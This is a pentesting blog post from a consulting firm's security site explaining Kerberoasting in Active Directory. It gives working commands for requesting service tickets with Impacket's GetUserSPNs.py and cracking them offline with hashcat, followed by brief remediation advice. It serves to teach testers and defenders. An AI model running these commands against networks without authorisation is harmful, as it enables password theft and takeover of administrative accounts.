• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar
  • Skip to footer

War Room

Shells from above

RSM logo

  • Home
  • About
  • Blog
  • Talks/Whitepapers
  • Tools
  • Recreation
Home > Back to Basics > Back to Basics: Kerberoasting

Back to Basics: Kerberoasting

October 26, 2022 By RSM Author

Welcome back to our “Back to Basics” series, where we provide you with an overview of the bread and butter pentesting techniques that we regularly see compromise networks. In this week’s installment, we’re looking at Kerberoasting.

Kerberoasting is a method to capture hashed passwords using the Kerberos network authentication protocol. This protocol protects network services by allowing users and servers to verify each other’s identity.

An attacker connected to the network can exploit this protocol by requesting Kerberos tickets for accounts configured with service principal names (SPNs). A portion of these tickets contain data encrypted with the NTLM hash of the targeted account, meaning an attacker can attempt to crack them to plaintext in order to obtain the user’s password. If the service account passwords are weak, then an attacker will likely crack them. Kerberos requests are common, and an attacker can often capture these hashed passwords without detection.

Kerberoasting is a valuable attack vector for testers because network administrators often neglect to remove local administrator, or even domain administrator, rights from the service accounts with SPNs. If you can compromise one of these service accounts you will likely gain administrative access.

How to Perform Kerberoasting

Once you have gained initial access to a low-privileged user account, look for service accounts configured with SPNs (utilizing GEtUserSPNs.py which is part of the Impacket suite):

GetUserSPNs.py example.com/username:password -request -dc-ip <target dc ip> -outputfile kerberoasting.txt

If you find this error from Linux: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

it is because of your local time and you need to synchronize the host with the DC:

ntpdate <IP of target DC>

Crack Kerberos tickets with hashcat:

# all tickets must be on their own line

hashcat -m 13100 kerberoasting.txt rockyou2021.txt -r rules\InsidePro-HashManager.rule -O –force -w 3

Also see our past article, Lateral Movement with Low Privilege Shell for Red Teams.

How to Remediate

We recommend removing SPNs from all domain administrator accounts and creating a dedicated nonhuman account with a long and complex password with the minimum necessary privileges to run the service.

This article was written by Kristen Gecewich, with a special thanks to Hunter Ezzell for providing images and technical expertise. 

Share this...
  • Reddit
  • Email
  • Facebook
  • Twitter
  • Linkedin

RSM Author

Primary Sidebar

Categories

  • Defense
  • Forensics
  • Offense
  • Physical
  • R&D

Most Viewed Posts

  • DLL Injection Part 1: SetWindowsHookEx 10.8k views
  • Sophos UTM Home Edition – 3 – The Setup 10.8k views
  • Leveraging MS16-032 with PowerShell Empire 10k views
  • Bypassing Gmail’s Malicious Macro Signatures 9.8k views
  • How to Bypass SEP with Admin Access 8.9k views

Footer

  • RSS
  • Twitter
  • Tools
  • About
  • RSM US LLP

+1 800 903 6264

1 S Wacker Dr Suite 800
Chicago, IL 60606

Copyright © 2023 RSM US LLP. All rights reserved. RSM US LLP is a limited liability partnership and the U.S. member firm of RSM International, a global network of independent audit, tax and consulting firms. The member firms of RSM International collaborate to provide services to global clients, but are separate and distinct legal entities that cannot obligate each other. Each member firm is responsible only for its own acts and omissions, and not those of any other party. Visit for more information regarding RSM US LLP and RSM International.